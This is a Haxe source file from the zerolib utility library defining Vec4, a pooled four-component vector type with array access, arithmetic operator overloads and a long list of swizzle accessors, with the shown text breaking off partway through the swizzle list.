"qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
01010111/zerolib | zero/utilities/Vec4.hx | package zero.utilities;
using Math;
/**
* A simple Vector class
*
* **Usage:**
*
* - Initialize using Vec4.get() `var vec = Vec4.get(0, 1, 0, 1);`
* - Or with an array `var vec:Vec4 = [0, 1, 0, 1];`
* - Recycle vectors when you're done with them: `my_vector.put()`
*/
abstract Vec4(Array<Float>)
{
// Utility
static var epsilon:Float = 1e-8;
static function zero(n:Float):Float return n.abs() <= epsilon ? 0 : n;
// Array creation/access
@:from static function from_array_float(input:Array<Float>) return Vec4.get(input[0], input[1], input[2], input[3]);
@:from static function from_array_int(input:Array<Int>) return Vec4.get(input[0], input[1], input[2], input[3]);
@:arrayAccess function arr_set(n:Int, v:Float) n < 0 || n > 3 ? return : this[n] = v;
@:arrayAccess function arr_get(n:Int):Float return this[n.min(3).max(0).floor()];
// Pooling
static var pool:Array<Vec4> = [];
public static function get(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0):Vec4 return pool != null && pool.length > 0 ? pool.shift().set(x, y, z, w) : new Vec4(x, y, z, w);
public inline function put()
{
pool.push(cast this);
this = null;
}
inline function new(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0) this = [x, y, z, w];
public inline function set(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0):Vec4
{
this[0] = zero(x);
this[1] = zero(y);
this[2] = zero(z);
this[3] = zero(w);
return cast this;
}
public var x (get, set):Float;
inline function get_x() return this[0];
inline function set_x(v) return this[0] = v;
public var y (get, set):Float;
inline function get_y() return this[1];
inline function set_y(v) return this[1] = v;
public var z (get, set):Float;
inline function get_z() return this[2];
inline function set_z(v) return this[2] = v;
public var w (get, set):Float;
inline function get_w() return this[3];
inline function set_w(v) return this[3] = v;
// These functions modify the vector in place!
public inline function copy_from(v:Vec4):Vec4 return set(v.x, v.y, v.z, v.w);
public inline function scale(n:Float):Vec4 return set(x * n, y * n, z * n, w * n);
public inline function copy():Vec4 return Vec4.get(x, y, z, w);
public inline function equals(v:Vec4):Bool return x == v.x && y == v.y && z == v.z && w == v.w;
public inline function toString():String return 'x: $x | y: $y | z: $z | w: $w';
// Operator Overloads
@:op(A + B) static function add(v1:Vec4, v2:Vec4):Vec4 return Vec4.get(v1.x + v2.x, v1.y + v2.y, v1.z + v2.z, v1.w + v2.w);
@:op(A + B) static function add_f(v:Vec4, n:Float):Vec4 return Vec4.get(v.x + n, v.y + n, v.z + n, v.w + n);
@:op(A - B) static function subtract(v1:Vec4, v2:Vec4):Vec4 return Vec4.get(v1.x - v2.x, v1.y - v2.y, v1.z - v2.z, v1.w - v2.w);
@:op(A - B) static function subtract_f(v:Vec4, n:Float):Vec4 return Vec4.get(v.x - n, v.y - n, v.z - n, v.w - n);
@:op(A * B) static function multiply(v1:Vec4, v2:Vec4):Vec4 return Vec4.get(v1.x * v2.x, v1.y * v2.y, v1.z * v2.z, v1.w * v2.w);
@:op(A * B) static function multiply_f(v:Vec4, n:Float):Vec4 return Vec4.get(v.x * n, v.y * n, v.z * n, v.w * n);
@:op(A / B) static function divide(v1:Vec4, v2:Vec4):Vec4 return Vec4.get(v1.x / v2.x, v1.y / v2.y, v1.z / v2.z, v1.w / v2.w);
@:op(A / B) static function divide_f(v:Vec4, n:Float):Vec4 return Vec4.get(v.x / n, v.y / n, v.z / n, v.w / n);
@:op(A % B) static function mod(v1:Vec4, v2:Vec4):Vec4 return Vec4.get(v1.x % v2.x, v1.y % v2.y, v1.z % v2.z, v1.w % v2.w);
@:op(A % B) static function mod_f(v:Vec4, n:Float):Vec4 return Vec4.get(v.x % n, v.y % n, v.z % n, v.w % n);
// Swizzling
@:dox(hide) public var xx (get, never):Vec2; private function get_xx() return Vec2.get(x, x);
@:dox(hide) public var xy (get, never):Vec2; private function get_xy() return Vec2.get(x, y);
@:dox(hide) public var xz (get, never):Vec2; private function get_xz() return Vec2.get(x, z);
@:dox(hide) public var xw (get, never):Vec2; private function get_xw() return Vec2.get(x, w);
@:dox(hide) public var yx (get, never):Vec2; private function get_yx() return Vec2.get(y, x);
@:dox(hide) public var yy (get, never):Vec2; private function get_yy() return Vec2.get(y, y);
@:dox(hide) public var yz (get, never):Vec2; private function get_yz() return Vec2.get(y, z);
@:dox(hide) public var yw (get, never):Vec2; private function get_yw() return Vec2.get(y, w);
@:dox(hide) public var zx (get, never):Vec2; private function get_zx() return Vec2.get(z, x);
@:dox(hide) public var zy (get, never):Vec2; private function get_zy() return Vec2.get(z, y);
@:dox(hide) public var zz (get, never):Vec2; private function get_zz() return Vec2.get(z, z);
@:dox(hide) public var zw (get, never):Vec2; private function get_zw() return Vec2.get(z, w);
@:dox(hide) public var wx (get, never):Vec2; private function get_wx() return Vec2.get(w, x);
@:dox(hide) public var wy (get, never):Vec2; private function get_wy() return Vec2.get(w, y);
@:dox(hide) public var wz (get, never):Vec2; private function get_wz() return Vec2.get(w, z);
@:dox(hide) public var ww (get, never):Vec2; private function get_ww() return Vec2.get(w, w);
@:dox(hide) public var xxx (get, never):Vec3; private function get_xxx() return Vec3.get(x, x, x);
@:dox(hide) public var xxy (get, never):Vec3; private function get_xxy() return Vec3.get(x, x, y);
@:dox(hide) public var xxz (get, never):Vec3; private function get_xxz() return Vec3.get(x, x, z);
@:dox(hide) public var xxw (get, never):Vec3; private function get_xxw() return Vec3.get(x, x, w);
@:dox(hide) public var xyx (get, never):Vec3; private function get_xyx() return Vec3.get(x, y, x);
@:dox(hide) public var xyy (get, never):Vec3; private function get_xyy() return Vec3.get(x, y, y);
@:dox(hide) public var xyz (get, never):Vec3; private function get_xyz() return Vec3.get(x, y, z);
@:dox(hide) public var xyw (get, never):Vec3; private function get_xyw() return Vec3.get(x, y, w);
@:dox(hide) public var xzx (get, never):Vec3; private function get_xzx() return Vec3.get(x, z, x);
@:dox(hide) public var xzy (get, never):Vec3; private function get_xzy() return Vec3.get(x, z, y);
@:dox(hide) public var xzz (get, never):Vec3; private function get_xzz() return Vec3.get(x, z, z);
@:dox(hide) public var xzw (get, never):Vec3; private function get_xzw() return Vec3.get(x, z, w);
@:dox(hide) public var xwx (get, never):Vec3; private function get_xwx() return Vec3.get(x, w, x);
@:dox(hide) public var xwy (get, never):Vec3; private function get_xwy() return Vec3.get(x, w, y);
@:dox(hide) public var xwz (get, never):Vec3; private function get_xwz() return Vec3.get(x, w, z);
@:dox(hide) public var xww (get, never):Vec3; private function get_xww() return Vec3.get(x, w, w);
@:dox(hide) public var yxx (get, never):Vec3; private function get_yxx() return Vec3.get(y, x, x);
@:dox(hide) public var yxy (get, never):Vec3; private function get_yxy() return Vec3.get(y, x, y);
@:dox(hide) public var yxz (get, never):Vec3; private function get_yxz() return Vec3.get(y, x, z);
@:dox(hide) public var yxw (get, never):Vec3; private function get_yxw() return Vec3.get(y, x, w);
@:dox(hide) public var yyx (get, never):Vec3; private function get_yyx() return Vec3.get(y, y, x);
@:dox(hide) public var yyy (get, never):Vec3; private function get_yyy() return Vec3.get(y, y, y);
@:dox(hide) public var yyz (get, never):Vec3; private function get_yyz() return Vec3.get(y, y, z);
@:dox(hide) public var yyw (get, never):Vec3; private function get_yyw() return Vec3.get(y, y, w);
@:dox(hide) public var yzx (get, never):Vec3; private function get_yzx() return Vec3.get(y, z, x);
@:dox(hide) public var yzy (get, never):Vec3; private function get_yzy() return Vec3.get(y, z, y);
@:dox(hide) public var yzz (get, never):Vec3; private function get_yzz() return Vec3.get(y, z, z);
@:dox(hide) public var yzw (get, never):Vec3; private function get_yzw() return Vec3.get(y, z, w);
@:dox(hide) public var ywx (get, never):Vec3; private function get_ywx() return Vec3.get(y, w, x);
@:dox(hide) public var ywy (get, never):Vec3; private function get_ywy() return Vec3.get(y, w, y);
@:dox(hide) public var ywz (get, never):Vec3; private function get_ywz() return Vec3.get(y, w, z);
@:dox(hide) public var yww (get, never):Vec3; private function get_yww() return Vec3.get(y, w, w);
@:dox(hide) public var zxx (get, never):Vec3; private function get_zxx() return Vec3.get(z, x, x);
@:dox(hide) public var zxy (get, never):Vec3; private function get_zxy() return Vec3.get(z, x, y);
@:dox(hide) public var zxz (get, never):Vec3; private function get_zxz() return Vec3.get(z, x, z);
@:dox(hide) public var zxw (get, never):Vec3; private function get_zxw() return Vec3.get(z, x, w);
@:dox(hide) public var zyx (get, never):Vec3; private function get_zyx() return Vec3.get(z, y, x);
@:dox(hide) public var zyy (get, never):Vec3; private function get_zyy() return Vec3.get(z, y, y);
@:dox(hide) public var zyz (get, never):Vec3; private function get_zyz() return Vec3.get(z, y, z);
@:dox(hide) public var zyw (get, never):Vec3; private function get_zyw() return Vec3.get(z, y, w);
@:dox(hide) public var zzx (get, never):Vec3; private function get_zzx() return Vec3.get(z, z, x);
@:dox(hide) public var zzy (get, never):Vec3; private function get_zzy() return Vec3.get(z, z, y);
@:dox(hide) public var zzz (get, never):Vec3; private function get_zzz() return Vec3.get(z, z, z);
@:dox(hide) public var zzw (get, never):Vec3; private function get_zzw() return Vec3.get(z, z, w);
@:dox(hide) public var zwx (get, never):Vec3; private function get_zwx() return Vec3.get(z, w, x);
@:dox(hide) public var zwy (get, never):Vec3; private function get_zwy() return Vec3.get(z, w, y);
@:dox(hide) public var zwz (get, never):Vec3; private function get_zwz() return Vec3.get(z, w, z);
@:dox(hide) public var zww (get, never):Vec3; private function get_zww() return Vec3.get(z, w, w);
@:dox(hide) public var wxx (get, never):Vec3; private function get_wxx() return Vec3.get(w, x, x);
@:dox(hide) public var wxy (get, never):Vec3; private function get_wxy() return Vec3.get(w, x, y);
@:dox(hide) public var wxz (get, never):Vec3; private function get_wxz() return Vec3.get(w, x, z);
@:dox(hide) public var wxw (get, never):Vec3; private function get_wxw() return Vec3.get(w, x, w);
@:dox(hide) public var wyx (get, never):Vec3; private function get_wyx() return Vec3.get(w, y, x);
@:dox(hide) public var wyy (get, never):Vec3; private function get_wyy() return Vec3.get(w, y, y);
@:dox(hide) public var wyz (get, never):Vec3; private function get_wyz() return Vec3.get(w, y, z);
@:dox(hide) public var wyw (get, never):Vec3; private function get_wyw() return Vec3.get(w, y, w);
@:dox(hide) public var wzx (get, never):Vec3; private function get_wzx() return Vec3.get(w, z, x);
@:dox(hide) public var wzy (get, never):Vec3; private function get_wzy() return Vec3.get(w, z, y);
@:dox(hide) public var wzz (get, never):Vec3; private function get_wzz() return Vec3.get(w, z, z);
@:dox(hide) public var wzw (get, never):Vec3; private function get_wzw() return Vec3.get(w, z, w);
@:dox(hide) public var wwx (get, never):Vec3; private function get_wwx() return Vec3.get(w, w, x);
@:dox(hide) public var wwy (get, never):Vec3; private function get_wwy() return Vec3.get(w, w, y);
@:dox(hide) public var wwz (get, never):Vec3; private function get_wwz() return Vec3.get(w, w, z);
@:dox(hide) public var www (get, never):Vec3; private function get_www() return Vec3.get(w, w, w);
@:dox(hide) public var xxxx (get, never):Vec4; private function get_xxxx() return Vec4.get(x, x, x, x);
@:dox(hide) public var xxxy (get, never):Vec4; private function get_xxxy() return Vec4.get(x, x, x, y);
@:dox(hide) public var xxxz (get, never):Vec4; private function get_xxxz() return Vec4.get(x, x, x, z);
@:dox(hide) public var xxxw (get, never):Vec4; private function get_xxxw() return Vec4.get(x, x, x, w);
@:dox(hide) public var xxyx (get, never):Vec4; private function get_xxyx() return Vec4.get(x, x, y, x);
@:dox(hide) public var xxyy (get, never):Vec4; private function get_xxyy() return Vec4.get(x, x, y, y);
@:dox(hide) public var xxyz (get, never):Vec4; private function get_xxyz() return Vec4.get(x, x, y, z);
@:dox(hide) public var xxyw (get, never):Vec4; private function get_xxyw() return Vec4.get(x, x, y, w);
@:dox(hide) public var xxzx (get, never):Vec4; private function get_xxzx() return Vec4.get(x, x, z, x);
@:dox(hide) public var xxzy (get, never):Vec4; private function get_xxzy() return Vec4.get(x, x, z, y);
@:dox(hide) public var xxzz (get, never):Vec4; private function get_xxzz() return Vec4.get(x, x, z, z);
@:dox(hide) public var xxzw (get, never):Vec4; private function get_xxzw() return Vec4.get(x, x, z, w);
@:dox(hide) public var xxwx (get, never):Vec4; private function get_xxwx() return Vec4.get(x, x, w, x);
@:dox(hide) public var xxwy (get, never):Vec4; private function get_xxwy() return Vec4.get(x, x, w, y);
@:dox(hide) public var xxwz (get, never):Vec4; private function get_xxwz() return Vec4.get(x, x, w, z);
@:dox(hide) public var xxww (get, never):Vec4; private function get_xxww() return Vec4.get(x, x, w, w);
@:dox(hide) public var xyxx (get, never):Vec4; private function get_xyxx() return Vec4.get(x, y, x, x);
@:dox(hide) public var xyxy (get, never):Vec4; private function get_xyxy() return Vec4.get(x, y, x, y);
@:dox(hide) public var xyxz (get, never):Vec4; private function get_xyxz() return Vec4.get(x, y, x, z);
@:dox(hide) public var xyxw (get, never):Vec4; private function get_xyxw() return Vec4.get(x, y, x, w);
@:dox(hide) public var xyyx (get, never):Vec4; private function get_xyyx() return Vec4.get(x, y, y, x);
@:dox(hide) public var xyyy (get, never):Vec4; private function get_xyyy() return Vec4.get(x, y, y, y);
@:dox(hide) public var xyyz (get, never):Vec4; private function get_xyyz() return Vec4.get(x, y, y, z);
@:dox(hide) public var xyyw (get, never):Vec4; private function get_xyyw() return Vec4.get(x, y, y, w);
@:dox(hide) public var xyzx (get, never):Vec4; private function get_xyzx() return Vec4.get(x, y, z, x);
@:dox(hide) public var xyzy (get, never):Vec4; private function get_xyzy() return Vec4.get(x, y, z, y);
@:dox(hide) public var xyzz (get, never):Vec4; private function get_xyzz() return Vec4.get(x, y, z, z);
@:dox(hide) public var xyzw (get, never):Vec4; private function get_xyzw() return Vec4.get(x, y, z, w);
@:dox(hide) public var xywx (get, never):Vec4; private function get_xywx() return Vec4.get(x, y, w, x);
@:dox(hide) public var xywy (get, never):Vec4; private function get_xywy() return Vec4.get(x, y, w, y);
@:dox(hide) public var xywz (get, never):Vec4; private function get_xywz() return Vec4.get(x, y, w, z);
@:dox(hide) public var xyww (get, never):Vec4; private function get_xyww() return Vec4.get(x, y, w, w);
@:dox(hide) public var xzxx (get, never):Vec4; private function get_xzxx() return Vec4.get(x, z, x, x);
@:dox(hide) public var xzxy (get, never):Vec4; private function get_xzxy() return Vec4.get(x, z, x, y);
@:dox(hide) public var xzxz (get, never):Vec4; private function get_xzxz() return Vec4.get(x, z, x, z);
@:dox(hide) public var xzxw (get, never):Vec4; private function get_xzxw() return Vec4.get(x, z, x, w);
@:dox(hide) public var xzyx (get, never):Vec4; private function get_xzyx() return Vec4.get(x, z, y, x);
@:dox(hide) public var xzyy (get, never):Vec4; private function get_xzyy() return Vec4.get(x, z, y, y);
@:dox(hide) public var xzyz (get, never):Vec4; private function get_xzyz() return Vec4.get(x, z, y, z);
@:dox(hide) public var xzyw (get, never):Vec4; private function get_xzyw() return Vec4.get(x, z, y, w);
@:dox(hide) public var xzzx (get, never):Vec4; private function get_xzzx() return Vec4.get(x, z, z, x);
@:dox(hide) public var xzzy (get, never):Vec4; private function get_xzzy() return Vec4.get(x, z, z, y);
@:dox(hide) public var xzzz (get, never):Vec4; private function get_xzzz() return Vec4.get(x, z, z, z);
@:dox(hide) public var xzzw (get, never):Vec4; private function get_xzzw() return Vec4.get(x, z, z, w);
@:dox(hide) public var xzwx (get, never):Vec4; private function get_xzwx() return Vec4.get(x, z, w, x);
@:dox(hide) public var xzwy (get, never):Vec4; private function get_xzwy() return Vec4.get(x, z, w, y);
@:dox(hide) public var xzwz (get, never):Vec4; private function get_xzwz() return Vec4.get(x, z, w, z);
@:dox(hide) public var xzww (get, never):Vec4; private function get_xzww() return Vec4.get(x, z, w, w);
@:dox(hide) public var xwxx (get, never):Vec4; private function get_xwxx() return Vec4.get(x, w, x, x);
@:dox(hide) public var xwxy (get, never):Vec4; private function get_xwxy() return Vec4.get(x, w, x, y);
@:dox(hide) public var xwxz (get, never):Vec4; private function get_xwxz() return Vec4.get(x, w, x, z);
@:dox(hide) public var xwxw (get, never):Vec4; private function get_xwxw() return Vec4.get(x, w, x, w);
@:dox(hide) public var xwyx (get, never):Vec4; private function get_xwyx() return Vec4.get(x, w, y, x);
@:dox(hide) public var xwyy (get, never):Vec4; private function get_xwyy() return Vec4.get(x, w, y, y);
@:dox(hide) public var xwyz (get, never):Vec4; private function get_xwyz() return Vec4.get(x, w, y, z);
@:dox(hide) public var xwyw (get, never):Vec4; private function get_xwyw() return Vec4.get(x, w, y, w);
@:dox(hide) public var xwzx (get, never):Vec4; private function get_xwzx() return Vec4.get(x, w, z, x);
@:dox(hide) public var xwzy (get, never):Vec4; private function get_xwzy() return Vec4.get(x, w, z, y);
@:dox(hide) public var xwzz (get, never):Vec4; private function get_xwzz() return Vec4.get(x, w, z, z);
@:dox(hide) public var xwzw (get, never):Vec4; private function get_xwzw() return Vec4.get(x, w, z, w);
@:dox(hide) public var xwwx (get, never):Vec4; private function get_xwwx() return Vec4.get(x, w, w, x);
@:dox(hide) public var xwwy (get, never):Vec4; private function get_xwwy() return Vec4.get(x, w, w, y);
@:dox(hide) public var xwwz (get, never):Vec4; private function get_xwwz() return Vec4.get(x, w, w, z);
@:dox(hide) public var xwww (get, never):Vec4; private function get_xwww() return Vec4.get(x, w, w, w);
@:dox(hide) public var yxxx (get, never):Vec4; private function get_yxxx() return Vec4.get(y, x, x, x);
@:dox(hide) public var yxxy (get, never):Vec4; private function get_yxxy() return Vec4.get(y, x, x, y);
@:dox(hide) public var yxxz (get, never):Vec4; private function get_yxxz() return Vec4.get(y, x, x, z);
@:dox(hide) public var yxxw (get, never):Vec4; private function get_yxxw() return Vec4.get(y, x, x, w);
@:dox(hide) public var yxyx (get, never):Vec4; private function get_yxyx() return Vec4.get(y, x, y, x);
@:dox(hide) public var yxyy (get, never):Vec4; private function get_yxyy() return Vec4.get(y, x, y, y);
@:dox(hide) public var yxyz (get, never):Vec4; private function get_yxyz() return Vec4.get(y, x, y, z);
@:dox(hide) public var yxyw (get, never):Vec4; private function get_yxyw() return Vec4.get(y, x, y, w);
@:dox(hide) public var yxzx (get, never):Vec4; private function get_yxzx() return Vec4.get(y, x, z, x);
@:dox(hide) public var yxzy (get, never):Vec4; private function get_yxzy() return Vec4.get(y, x, z, y);
@:dox(hide) public var yxzz (get, never):Vec4; private function get_yxzz() return Vec4.get(y, x, z, z);
@:dox(hide) public var yxzw (get, never):Vec4; private function get_yxzw() return Vec4.get(y, x, z, w);
@:dox(hide) public var yxwx (get, never):Vec4; private function get_yxwx() return Vec4.get(y, x, w, x);
@:dox(hide) public var yxwy (get, never):Vec4; private function get_yxwy() return Vec4.get(y, x, w, y);
@:dox(hide) public var yxwz (get, never):Vec4; private function get_yxwz() return Vec4.get(y, x, w, z);
@:dox(hide) public var yxww (get, never):Vec4; private function get_yxww() return Vec4.get(y, x, w, w);
@:dox(hide) public var yyxx (get, never):Vec4; private function get_yyxx() return Vec4.get(y, y, x, x);
@:dox(hide) public var yyxy (get, never):Vec4; private function get_yyxy() return Vec4.get(y, y, x, y);
@:dox(hide) public var yyxz (get, never):Vec4; private function get_yyxz() return Vec4.get(y, y, x, z);
@:dox(hide) public var yyxw (get, never):Vec4; private function get_yyxw() return Vec4.get(y, y, x, w);
@:dox(hide) public var yyyx (get, never):Vec4; private function get_yyyx() return Vec4.get(y, y, y, x);
@:dox(hide) public var yyyy (get, never):Vec4; private function get_yyyy() return Vec4.get(y, y, y, y);
@:dox(hide) public var yyyz (get, never):Vec4; private function get_yyyz() return Vec4.get(y, y, y, z);
@:dox(hide) public var yyyw (get, never):Vec4; private function get_yyyw() return Vec4.get(y, y, y, w);
@:dox(hide) public var yyzx (get, never):Vec4; private function get_yyzx() return Vec4.get(y, y, z, x);
@:dox(hide) public var yyzy (get, never):Vec4; private function get_yyzy() return Vec4.get(y, y, z, y);
@:dox(hide) public var yyzz (get, never):Vec4; private function get_yyzz() return Vec4.get(y, y, z, z);
@:dox(hide) public var yyzw (get, never):Vec4; private function get_yyzw() return Vec4.get(y, y, z, w);
@:dox(hide) public var yywx (get, never):Vec4; private function get_yywx() return Vec4.get(y, y, w, x);
@:dox(hide) public var yywy (get, never):Vec4; private function get_yywy() return Vec4.get(y, y, w, y);
@:dox(hide) public var yywz (get, never):Vec4; private function get_yywz() return Vec4.get(y, y, w, z);
@:dox(hide) public var yyww (get, never):Vec4; private function get_yyww() return Vec4.get(y, y, w, w);
@:dox(hide) public var yzxx (get, never):Vec4; private function get_yzxx() return Vec4.get(y, z, x, x);
@:dox(hide) public var yzxy (get, never):Vec4; private function get_yzxy() return Vec4.get(y, z, x, y);
@:dox(hide) public var yzxz (get, never):Vec4; private function get_yzxz() return Vec4.get(y, z, x, z);
@:dox(hide) public var yzxw (get, never):Vec4; private function get_yzxw() return Vec4.get(y, z, x, w);
@:dox(hide) public var yzyx (get, never):Vec4; private function get_yzyx() return Vec4.get(y, z, y, x);
@:dox(hide) public var yzyy (get, never):Vec4; private function get_yzyy() return Vec4.get(y, z, y, y);
@:dox(hide) public var yzyz (get, never):Vec4; private function get_yzyz() return Vec4.get(y, z, y, z);
@:dox(hide) public var yzyw (get, never):Vec4; private function get_yzyw() return Vec4.get(y, z, y, w);
@:dox(hide) public var yzzx (get, never):Vec4; private function get_yzzx() return Vec4.get(y, z, z, x);
@:dox(hide) public var yzzy (get, never):Vec4; private function get_yzzy() return Vec4.get(y, z, z, y);
@:dox(hide) public var yzzz (get, never):Vec4; private function get_yzzz() return Vec4.get(y, z, z, z);
@:dox(hide) public var yzzw (get, never):Vec4; private function get_yzzw() return Vec4.get(y, z, z, w);
@:dox(hide) public var yzwx (get, never):Vec4; private function get_yzwx() return Vec4.get(y, z, w, x);
@:dox(hide) public var yzwy (get, never):Vec4; private function get_yzwy() return Vec4.get(y, z, w, y);
@:dox(hide) public var yzwz (get, never):Vec4; private function get_yzwz() return Vec4.get(y, z, w, z);
@:dox(hide) public var yzww (get, never):Vec4; private function get_yzww() return Vec4.get(y, z, w, w);
@:dox(hide) public var ywxx (get, never):Vec4; private function get_ywxx() return Vec4.get(y, w, x, x);
@:dox(hide) public var ywxy (get, never):Vec4; private function get_ywxy() return Vec4.get(y, w, x, y);
@:dox(hide) public var ywxz (get, never):Vec4; private function get_ywxz() return Vec4.get(y, w, x, z);
@:dox(hide) public var ywxw (get, never):Vec4; private function get_ywxw() return Vec4.get(y, w, x, w);
@:dox(hide) public var ywyx (get, never):Vec4; private function get_ywyx() return Vec4.get(y, w, y, x);
@:dox(hide) public var ywyy (get, never):Vec4; private function get_ywyy() return Vec4.get(y, w, y, y);
@:dox(hide) public var ywyz (get, never):Vec4; private function get_ywyz() return Vec4.get(y, w, y, z);
@:dox(hide) public var ywyw (get, never):Vec4; private function get_ywyw() return Vec4.get(y, w, y, w);
@:dox(hide) public var ywzx (get, never):Vec4; private function get_ywzx() return Vec4.get(y, w, z, x);
@:dox(hide) public var ywzy (get, never):Vec4; private function get_ywzy() return Vec4.get(y, w, z, y);
@:dox(hide) public var ywzz (get, never):Vec4; private function get_ywzz() return Vec4.get(y, w, z, z);
@:dox(hide) public var ywzw (get, never):Vec4; private function get_ywzw() return Vec4.get(y, w, z, w);
@:dox(hide) public var ywwx (get, never):Vec4; private function get_ywwx() return Vec4.get(y, w, w, x);
@:dox(hide) public var ywwy (get, never):Vec4; private function get_ywwy() return Vec4.get(y, w, w, y);
@:dox(hide) public var ywwz (get, never):Vec4; private function get_ywwz() return Vec4.get(y, w, w, z);
@:dox(hide) public var ywww (get, never):Vec4; private function get_ywww() return Vec4.get(y, w, w, w);
@:dox(hide) public var zxxx (get, never):Vec4; private function get_zxxx() return Vec4.get(z, x, x, x);
@:dox(hide) public var zxxy (get, never):Vec4; private function get_zxxy() return Vec4.get(z, x, x, y);
@:dox(hide) public var zxxz (get, never):Vec4; private function get_zxxz() return Vec4.get(z, x, x, z);
@:dox(hide) public var zxxw (get, never):Vec4; private function get_zxxw() return Vec4.get(z, x, x, w);
@:dox(hide) public var zxyx (get, never):Vec4; private function get_zxyx() return Vec4.get(z, x, y, x);
@:dox(hide) public var zxyy (get, never):Vec4; private function get_zxyy() return Vec4.get(z, x, y, y);
@:dox(hide) public var zxyz (get, never):Vec4; private function get_zxyz() return Vec4.get(z, x, y, z);
@:dox(hide) public var zxyw (get, never):Vec4; private function get_zxyw() return Vec4.get(z, x, y, w);
@:dox(hide) public var zxzx (get, never):Vec4; private function get_zxzx() return Vec4.get(z, x, z, x);
@:dox(hide) public var zxzy (get, never):Vec4; private function get_zxzy() return Vec4.get(z, x, z, y);
@:dox(hide) public var zxzz (get, never):Vec4; private function get_zxzz() return Vec4.get(z, x, z, z);
@:dox(hide) public var zxzw (get, never):Vec4; private function get_zxzw() return Vec4.get(z, x, z, w);
@:dox(hide) public var zxwx (get, never):Vec4; private function get_zxwx() return Vec4.get(z, x, w, x);
@:dox(hide) public var zxwy (get, never):Vec4; private function get_zxwy() return Vec4.get(z, x, w, y);
@:dox(hide) public var zxwz (get, never):Vec4; private function get_zxwz() return Vec4.get(z, x, w, z);
@:dox(hide) public var zxww (get, never):Vec4; private function get_zxww() return Vec4.get(z, x, w, w);
@:dox(hide) public var zyxx (get, never):Vec4; private function get_zyxx() return Vec4.get(z, y, x, x);
@:dox(hide) public var zyxy (get, never):Vec4; private function get_zyxy() return Vec4.get(z, y, x, y);
@:dox(hide) public var zyxz (get, never):Vec4; private function get_zyxz() return Vec4.get(z, y, x, z);
@:dox(hide) public var zyxw (get, never):Vec4; private function get_zyxw() return Vec4.get(z, y, x, w);
@:dox(hide) public var zyyx (get, never):Vec4; private function get_zyyx() return Vec4.get(z, y, y, x);
@:dox(hide) public var zyyy (get, never):Vec4; private function get_zyyy() return Vec4.get(z, y, y, y);
@:dox(hide) public var zyyz (get, never):Vec4; private function get_zyyz() return Vec4.get(z, y, y, z);
@:dox(hide) public var zyyw (get, never):Vec4; private function get_zyyw() return Vec4.get(z, y, y, w);
@:dox(hide) public var zyzx (get, never):Vec4; private function get_zyzx() return Vec4.get(z, y, z, x);
@:dox(hide) public var zyzy (get, never):Vec4; private function get_zyzy() return Vec4.get(z, y, z, y);
@:dox(hide) public var zyzz (get, never):Vec4; private function get_zyzz() return Vec4.get(z, y, z, z);
@:dox(hide) public var zyzw (get, never):Vec4; private function get_zyzw() return Vec4.get(z, y, z, w);
@:dox(hide) public var zywx (get, never):Vec4; private function get_zywx() return Vec4.get(z, y, w, x);
@:dox(hide) public var zywy (get, never):Vec4; private function get_zywy() return Vec4.get(z, y, w, y);
@:dox(hide) public var zywz (get, never):Vec4; private function get_zywz() return Vec4.get(z, y, w, z);
@:dox(hide) public var zyww (get, never):Vec4; private function get_zyww() return Vec4.get(z, y, w, w);
@:dox(hide) public var zzxx (get, never):Vec4; private function get_zzxx() return Vec4.get(z, z, x, x);
@:dox(hide) public var zzxy (get, never):Vec4; private function get_zzxy() return Vec4.get(z, z, x, y);
@:dox(hide) public var zzxz (get, never):Vec4; private function get_zzxz() return Vec4.get(z, z, x, z);
@:dox(hide) public var zzxw (get, never):Vec4; private function get_zzxw() return Vec4.get(z, z, x, w);
@:dox(hide) public var zzyx (get, never):Vec4; private function get_zzyx() return Vec4.get(z, z, y, x);
@:dox(hide) public var zzyy (get, never):Vec4; private function get_zzyy() return Vec4.get(z, z, y, y);
@:dox(hide) public var zzyz (get, never):Vec4; private function get_zzyz() return Vec4.get(z, z, y, z);
@:dox(hide) public var zzyw (get, never):Vec4; private function get_zzyw() return Vec4.get(z, z, y, w);
@:dox(hide) public var zzzx (get, never):Vec4; private function get_zzzx() return Vec4.get(z, z, z, x);
@:dox(hide) public var zzzy (get, never):Vec4; private function get_zzzy() return Vec4.get(z, z, z, y);
@:dox(hide) public var zzzz (get, never):Vec4; private function get_zzzz() return Vec4.get(z, z, z, z);
@:dox(hide) public var zzzw (get, never):Vec4; private function get_zzzw() return Vec4.get(z, z, z, w);
@:dox(hide) public var zzwx (get, never):Vec4; private function get_zzwx() return Vec4.get(z, z, w, x);
@:dox(hide) public var zzwy (get, never):Vec4; private function get_zzwy() return Vec4.get(z, z, w, y);
@:dox(hide) public var zzwz (get, never):Vec4; private function get_zzwz() return Vec4.get(z, z, w, z);
@:dox(hide) public var zzww (get, never):Vec4; private function get_zzww() return Vec4.get(z, z, w, w);
@:dox(hide) public var zwxx (get, never):Vec4; private function get_zwxx() return Vec4.get(z, w, x, x);
@:dox(hide) public var zwxy (get, never):Vec4; private function get_zwxy() return Vec4.get(z, w, x, y);
@:dox(hide) public var zwxz (get, never):Vec4; private function get_zwxz() return Vec4.get(z, w, x, z);
